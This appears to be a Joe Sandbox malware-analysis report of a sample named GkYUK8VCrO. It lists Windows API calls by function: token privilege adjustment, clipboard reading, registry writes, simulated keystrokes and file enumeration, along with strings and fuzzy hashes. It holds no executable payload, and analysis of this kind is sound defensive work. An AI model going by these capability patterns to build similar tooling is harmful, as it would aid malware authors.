                                • Instruction ID: fe8c542e0b9c015ce8672a746f327c706e841ae726f17a266f93265ee2266b43
                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                • Instruction Fuzzy Hash: 3131AF71A40105DBC718DF58D480E69FBB6FB59300B6A8AA9E40ACB651DB31EDC1CBC0
                                APIs
                                • Sleep.KERNELBASE(000001F4), ref: 00A422B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681768702.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_a40000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                • Instruction ID: 3c1d1f8ae81557702209bab52da547459dc8225676dc3765e2dc1e690d018573
                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                • Instruction Fuzzy Hash: B6E0BF7494010EEFDB00EFA5D5496DE7BB4EF44311F1005A1FD05D7680DB709E548A62
                                APIs
                                • Sleep.KERNELBASE(000001F4), ref: 00A422B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681768702.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_a40000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                • Instruction ID: 30f0ad15f589f24e0162945314f8cf9adfa38c3c8fec891298c69158bdf64ea0
                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                • Instruction Fuzzy Hash: 98E0E67494010EDFDB00EFB5D5496DE7FB4EF44301F100161FD01D2280D6709D508A72
                                APIs
                                  • Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623
                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B2CE50
                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B2CE91
                                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B2CED6
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B2CF00
                                • SendMessageW.USER32 ref: 00B2CF29
                                • _wcsncpy.LIBCMT ref: 00B2CFA1
                                • GetKeyState.USER32(00000011), ref: 00B2CFC2
                                • GetKeyState.USER32(00000009), ref: 00B2CFCF
                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B2CFE5
                                • GetKeyState.USER32(00000010), ref: 00B2CFEF
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B2D018
                                • SendMessageW.USER32 ref: 00B2D03F
                                • SendMessageW.USER32(?,00001030,?,00B2B602), ref: 00B2D145
                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B2D15B
                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B2D16E
                                • SetCapture.USER32(?), ref: 00B2D177
                                • ClientToScreen.USER32(?,?), ref: 00B2D1DC
                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B2D1E9
                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B2D203
                                • ReleaseCapture.USER32 ref: 00B2D20E
                                • GetCursorPos.USER32(?), ref: 00B2D248
                                • ScreenToClient.USER32(?,?), ref: 00B2D255
                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B2D2B1
                                • SendMessageW.USER32 ref: 00B2D2DF
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B2D31C
                                • SendMessageW.USER32 ref: 00B2D34B
                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B2D36C
                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B2D37B
                                • GetCursorPos.USER32(?), ref: 00B2D39B
                                • ScreenToClient.USER32(?,?), ref: 00B2D3A8
                                • GetParent.USER32(?), ref: 00B2D3C8
                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B2D431
                                • SendMessageW.USER32 ref: 00B2D462
                                • ClientToScreen.USER32(?,?), ref: 00B2D4C0
                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B2D4F0
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B2D51A
                                • SendMessageW.USER32 ref: 00B2D53D
                                • ClientToScreen.USER32(?,?), ref: 00B2D58F
                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B2D5C3
                                  • Part of subcall function 00AA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AA25EC
                                • GetWindowLongW.USER32(?,000000F0), ref: 00B2D65F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                • String ID: @GUI_DRAGID$F
                                • API String ID: 3977979337-4164748364
                                • Opcode ID: 62230436078e1f510551dab5622abe0e8de539ced8fd97b7ec80dba5be0c6fe9
                                • Instruction ID: 866e1635d54ee1c39c2344d74887ad7e8938e89923beabc886809a883147cb27
                                • Opcode Fuzzy Hash: 62230436078e1f510551dab5622abe0e8de539ced8fd97b7ec80dba5be0c6fe9
                                • Instruction Fuzzy Hash: B642AF30204251AFD721DF28D884FAABFF5FF49314F1409ADF659972A0CB71A855CB92
                                APIs
                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00B2873F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: %d/%02d/%02d
                                • API String ID: 3850602802-328681919
                                • Opcode ID: 2f6fd034ee2a529c4a15f86e1b84613348112f865524bedbd82a1364ace9094f
                                • Instruction ID: 6976105fb2957cd853c79d4b69aa2bd5bb16c862658da80cabf41150385bbfc5
                                • Opcode Fuzzy Hash: 2f6fd034ee2a529c4a15f86e1b84613348112f865524bedbd82a1364ace9094f
                                • Instruction Fuzzy Hash: 8A12C271501225ABEB258F24EC89FAE7BF8EF49710F1041A9F919EB2E1DF708941CB50
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _memmove$_memset
                                • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                • API String ID: 1357608183-1798697756
                                • Opcode ID: 09e1bfb4d27a8626373e48c988fc79d8755f494d3304c5d62a8d1a94a886a25a
                                • Instruction ID: 2fd4789b611b509ba348518d3eaa104e5c6e0c5a6db5ede36141a47da3307116
                                • Opcode Fuzzy Hash: 09e1bfb4d27a8626373e48c988fc79d8755f494d3304c5d62a8d1a94a886a25a
                                • Instruction Fuzzy Hash: 58938E71A042199BDF24CF98C891BFDB7B1FF48710F25816AEA55EB281E7749E81CB40
                                APIs
                                • GetForegroundWindow.USER32(00000000,?), ref: 00AA4A3D
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00ADDA8E
                                • IsIconic.USER32(?), ref: 00ADDA97
                                • ShowWindow.USER32(?,00000009), ref: 00ADDAA4
                                • SetForegroundWindow.USER32(?), ref: 00ADDAAE
                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00ADDAC4
                                • GetCurrentThreadId.KERNEL32 ref: 00ADDACB
                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADDAD7
                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 00ADDAE8
                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 00ADDAF0
                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00ADDAF8
                                • SetForegroundWindow.USER32(?), ref: 00ADDAFB
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADDB10
                                • keybd_event.USER32(00000012,00000000), ref: 00ADDB1B
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADDB25
                                • keybd_event.USER32(00000012,00000000), ref: 00ADDB2A
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADDB33
                                • keybd_event.USER32(00000012,00000000), ref: 00ADDB38
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00ADDB42
                                • keybd_event.USER32(00000012,00000000), ref: 00ADDB47
                                • SetForegroundWindow.USER32(?), ref: 00ADDB4A
                                • AttachThreadInput.USER32(?,?,00000000), ref: 00ADDB71
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                • String ID: Shell_TrayWnd
                                • API String ID: 4125248594-2988720461
                                • Opcode ID: c65fd57fd02616ade0e2776483bac28076d2261dd827726b10316befc43d50b5
                                • Instruction ID: da3680fa4fe54e5f7491656ef30d9ded942bcb7bdaf7abbd3c553762f1bd4f18
                                • Opcode Fuzzy Hash: c65fd57fd02616ade0e2776483bac28076d2261dd827726b10316befc43d50b5
                                • Instruction Fuzzy Hash: C8315071A40319BAEB316FA19C49F7E3E7CEB44B50F114036FA05AB2D0CAB05D01AAA1
                                APIs
                                  • Part of subcall function 00AF8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF8D0D
                                  • Part of subcall function 00AF8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF8D3A
                                  • Part of subcall function 00AF8CC3: GetLastError.KERNEL32 ref: 00AF8D47
                                • _memset.LIBCMT ref: 00AF889B
                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00AF88ED
                                • CloseHandle.KERNEL32(?), ref: 00AF88FE
                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AF8915
                                • GetProcessWindowStation.USER32 ref: 00AF892E
                                • SetProcessWindowStation.USER32(00000000), ref: 00AF8938
                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AF8952
                                  • Part of subcall function 00AF8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AF8851), ref: 00AF8728
                                  • Part of subcall function 00AF8713: CloseHandle.KERNEL32(?,?,00AF8851), ref: 00AF873A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                • String ID: $default$winsta0
                                • API String ID: 2063423040-1027155976
                                • Opcode ID: 8d30c80a6f50be43f8cce5c4e40f5f2a058ae23fea3932277222eac23f55f62e
                                • Instruction ID: 32ddff6f32e27c0434ae24bdcc1b25942ae5b5f048da01ebc96c318103342dcc
                                • Opcode Fuzzy Hash: 8d30c80a6f50be43f8cce5c4e40f5f2a058ae23fea3932277222eac23f55f62e
                                • Instruction Fuzzy Hash: F281277190020DABDF21EFE4DD45AFEBBB8EF04344F09416AFA10A6161DB398A15DB60
                                APIs
                                • OpenClipboard.USER32(00B2F910), ref: 00B14284
                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B14292
                                • GetClipboardData.USER32(0000000D), ref: 00B1429A
                                • CloseClipboard.USER32 ref: 00B142A6
                                • GlobalLock.KERNEL32(00000000), ref: 00B142C2
                                • CloseClipboard.USER32 ref: 00B142CC
                                • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00B142E1
                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00B142EE
                                • GetClipboardData.USER32(00000001), ref: 00B142F6
                                • GlobalLock.KERNEL32(00000000), ref: 00B14303
                                • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00B14337
                                • CloseClipboard.USER32 ref: 00B14447
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                • String ID:
                                • API String ID: 3222323430-0
                                • Opcode ID: 9faf4237472a2e0f9616a98d33d38152614e5053ef1b8f6b0d978b93d5f9502c
                                • Instruction ID: 774309e85c5fdc0310b5dbe4840253f76afd0f3499ab2ec76ffd4a2c41257622
                                • Opcode Fuzzy Hash: 9faf4237472a2e0f9616a98d33d38152614e5053ef1b8f6b0d978b93d5f9502c
                                • Instruction Fuzzy Hash: 92518B71204202ABD321AB60ED8AFBF77B8EF85B00F504579F556D32E1DF70D9468A62
                                APIs
                                • FindFirstFileW.KERNEL32(?,?), ref: 00B0C9F8
                                • FindClose.KERNEL32(00000000), ref: 00B0CA4C
                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B0CA71
                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B0CA88
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B0CAAF
                                • __swprintf.LIBCMT ref: 00B0CAFB
                                • __swprintf.LIBCMT ref: 00B0CB3E
                                  • Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82
                                • __swprintf.LIBCMT ref: 00B0CB92
                                  • Part of subcall function 00AC38D8: __woutput_l.LIBCMT ref: 00AC3931
                                • __swprintf.LIBCMT ref: 00B0CBE0
                                  • Part of subcall function 00AC38D8: __flsbuf.LIBCMT ref: 00AC3953
                                  • Part of subcall function 00AC38D8: __flsbuf.LIBCMT ref: 00AC396B
                                • __swprintf.LIBCMT ref: 00B0CC2F
                                • __swprintf.LIBCMT ref: 00B0CC7E
                                • __swprintf.LIBCMT ref: 00B0CCCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                • API String ID: 3953360268-2428617273
                                • Opcode ID: 8e87796a027e8a56d3c1c27f3956b2ac3abce5630dead969df6b73078403f851
                                • Instruction ID: dcd9dfab6ae8f6616ed10e6220bd460bddcea5e97b3585ab7d60b38c8e770220
                                • Opcode Fuzzy Hash: 8e87796a027e8a56d3c1c27f3956b2ac3abce5630dead969df6b73078403f851
                                • Instruction Fuzzy Hash: F4A10EB2508305ABC710EB64CD85EAFB7ECEF95700F40496DB586D7191EB34DA09CB62
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B0F221
                                • _wcscmp.LIBCMT ref: 00B0F236
                                • _wcscmp.LIBCMT ref: 00B0F24D
                                • GetFileAttributesW.KERNEL32(?), ref: 00B0F25F
                                • SetFileAttributesW.KERNEL32(?,?), ref: 00B0F279
                                • FindNextFileW.KERNEL32(00000000,?), ref: 00B0F291
                                • FindClose.KERNEL32(00000000), ref: 00B0F29C
                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00B0F2B8
                                • _wcscmp.LIBCMT ref: 00B0F2DF
                                • _wcscmp.LIBCMT ref: 00B0F2F6
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00B0F308
                                • SetCurrentDirectoryW.KERNEL32(00B5A5A0), ref: 00B0F326
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0F330
                                • FindClose.KERNEL32(00000000), ref: 00B0F33D
                                • FindClose.KERNEL32(00000000), ref: 00B0F34F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                • String ID: *.*
                                • API String ID: 1803514871-438819550
                                • Opcode ID: db04e00fd855a179507a7f6f4d6dfb981535c81b266daf0dd54633bb0870004c
                                • Instruction ID: 02aab57da271c88c0cac0178ece08f9d98cfbec69f9d8c9e5f27a59b1f885437
                                • Opcode Fuzzy Hash: db04e00fd855a179507a7f6f4d6dfb981535c81b266daf0dd54633bb0870004c
                                • Instruction Fuzzy Hash: 3F31837660121A6ADB20DBA4EC49EFE77ECEF49361F1441B5F814E30E0EB70DA458A54
                                APIs
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B20BDE
                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B2F910,00000000,?,00000000,?,?), ref: 00B20C4C
                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B20C94
                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B20D1D
                                • RegCloseKey.ADVAPI32(?), ref: 00B2103D
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B2104A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Close$ConnectCreateRegistryValue
                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                • API String ID: 536824911-966354055
                                • Opcode ID: 079a08074da558f8ae250aabc4d6337c6be56ad6ebcb806b9b6bea461d526eb0
                                • Instruction ID: bd8457619e966e73887b317fb6283acaef41fc35b4ac922ea403efd0ad1f041e
                                • Opcode Fuzzy Hash: 079a08074da558f8ae250aabc4d6337c6be56ad6ebcb806b9b6bea461d526eb0
                                • Instruction Fuzzy Hash: BE024C752006119FCB14EF28D995E2BB7E5FF89714F04889DF8899B2A2DB31ED41CB81
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B0F37E
                                • _wcscmp.LIBCMT ref: 00B0F393
                                • _wcscmp.LIBCMT ref: 00B0F3AA
                                  • Part of subcall function 00B045C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B045DC
                                • FindNextFileW.KERNEL32(00000000,?), ref: 00B0F3D9
                                • FindClose.KERNEL32(00000000), ref: 00B0F3E4
                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00B0F400
                                • _wcscmp.LIBCMT ref: 00B0F427
                                • _wcscmp.LIBCMT ref: 00B0F43E
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00B0F450
                                • SetCurrentDirectoryW.KERNEL32(00B5A5A0), ref: 00B0F46E
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0F478
                                • FindClose.KERNEL32(00000000), ref: 00B0F485
                                • FindClose.KERNEL32(00000000), ref: 00B0F497
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                • String ID: *.*
                                • API String ID: 1824444939-438819550
                                • Opcode ID: abaa931b7a3de17ee2f7780283290b8f19926ad50dcc64ec63874bab9c1e0f61
                                • Instruction ID: 1ea240b3c3fa6df43579731125787921b88eb9dc2fe9db2dda845910b0022ed8
                                • Opcode Fuzzy Hash: abaa931b7a3de17ee2f7780283290b8f19926ad50dcc64ec63874bab9c1e0f61
                                • Instruction Fuzzy Hash: AE31937260121A6ACF20EB64EC88EFE7BECDF49361F1042F5E854A35E0DB70DA45CA54
                                APIs
                                  • Part of subcall function 00AF874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF8766
                                  • Part of subcall function 00AF874A: GetLastError.KERNEL32(?,00AF822A,?,?,?), ref: 00AF8770
                                  • Part of subcall function 00AF874A: GetProcessHeap.KERNEL32(00000008,?,?,00AF822A,?,?,?), ref: 00AF877F
                                  • Part of subcall function 00AF874A: HeapAlloc.KERNEL32(00000000,?,00AF822A,?,?,?), ref: 00AF8786
                                  • Part of subcall function 00AF874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF879D
